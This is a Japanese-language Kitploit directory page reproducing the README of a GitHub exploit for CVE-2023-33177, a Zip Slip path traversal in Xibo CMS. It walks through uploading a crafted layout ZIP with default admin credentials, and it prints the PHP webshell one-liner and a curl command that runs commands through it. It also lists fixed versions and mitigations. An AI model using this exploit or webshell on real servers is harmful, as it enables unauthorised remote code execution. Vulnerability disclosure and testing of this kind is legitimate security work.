Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — このエクスプロイトは、Xibo CMS (CVE-2023-33177) における **パストラバーサルの脆弱性** を実証しており、悪意のあるレイアウトインポートを通じてリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

このエクスプロイトは、Xibo CMS (CVE-2023-33177) における **パストラバーサルの脆弱性** を実証しており、悪意のあるレイアウトインポートを通じてリモートコード実行を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
9ヶ月前未レビュー

Xibo CMS Zip Slip RCE エクスプロイト CVE-2023-33177

このエクスプロイトは、Xibo CMS (CVE-2023-33177) のパストラバーサル脆弱性を実証し、悪意のあるレイアウトインポートを通じてリモートコード実行を可能にします。

脆弱性の詳細

CVE/アドバイザリ: CVE-2023-33177 影響を受けるバージョン:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

脆弱性タイプ: パストラバーサル (Zip Slip) 影響: リモートコード実行 (RCE)

技術的概要

Xibo CMS は、認証されたユーザーが ZIP アーカイブを介してレイアウトファイルをインポートすることを許可します。インポート機能は mapping.json ファイル内のファイルパスを適切に検証できず、攻撃者はパストラバーサルシーケンス (../../) を使用して、意図されたライブラリディレクトリの外部にファイルを書き込むことができます。

エクスプロイトの仕組み

  1. 有効な Xibo レイアウトエクスポート構造を作成し、必要な JSON ファイルを含める
  2. mapping.json にパストラバーサルを注入: ファイルパスとして ../../web/shell.php を使用
  3. ZIP 構造内のトラバースされたパスにウェブシェルを配置: library/../../web/shell.php
  4. Xibo が検証なしで展開: /var/www/cms/web/shell.php に解決される
  5. RCE を達成: ウェブシェルがウェブルートでアクセス可能

脆弱性の連鎖

root@kitploit:~
Zip contains: library/../../web/shell.php
Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
Result:       /var/www/cms/web/shell.php ← Webshell in web root!

使用方法

エクスプロイトの生成

root@kitploit:~
python3 create_exploit.py

これにより、悪意のあるレイアウトパッケージを含む exploit.zip が作成されます。

悪用手順

  1. Xibo CMS にアクセスし、認証情報でログイン (デフォルト: xibo_admin / password)
  2. インポートに移動: デザイン → レイアウト → インポート
  3. exploit.zip をアップロード
  4. JSON エラーは無視 - ウェブシェルは既にディスクに書き込まれている
  5. ウェブシェル経由でコマンドを実行:
    root@kitploit:~
    curl 'http://localhost:8080/shell.php?cmd=id'
    

ファイル構造

エクスプロイト ZIP の内容:

root@kitploit:~
exploit.zip
├── layout.json          # Valid Xibo layout definition
├── playlist.json        # Empty playlist (triggers JSON import)
├── mapping.json         # Contains path traversal payload
└── library/
    └── ../../web/
        └── shell.php    # PHP webshell (gets extracted to web root)

ウェブシェルの機能

組み込まれたウェブシェルは最小限です:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

アクセス方法: http://<target>/shell.php?cmd=<command>

緩和策

修正済みバージョン:

  • Xibo CMS 2.3.17+ へのアップグレード (2.x ブランチ向け)
  • Xibo CMS 3.3.5+ へのアップグレード (3.x ブランチ向け)

緩和戦略:

  1. 展開前に ZIP アーカイブ内のすべてのファイルパスを検証する
  2. .. や絶対パスを含むパスを拒否する
  3. ディレクトリトラバーサルを防止する安全な展開方法を使用する
  4. インポート機能に適切な入力検証を実装する
  5. ファイルアップロード権限を認証済みかつ承認されたユーザーのみに制限する

法的および倫理的注意事項

このエクスプロイトは以下の目的で提供されます:

  • 教育目的
  • CTF コンペティション
  • 許可されたセキュリティテスト
  • 防御的なセキュリティ研究

所有していない、またはテストの明示的な許可がないシステムに対してこのエクスプロイトを使用しないでください。

参考文献

  • アドバイザリ: GHSA-jj27-x85q-crqv
  • Xibo CMS: https://xibo.org.uk/
  • Zip Slip 脆弱性: https://security.snyk.io/research/zip-slip-vulnerability
  • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

著者

complexusprada 2025年11月

ツールをダウンロード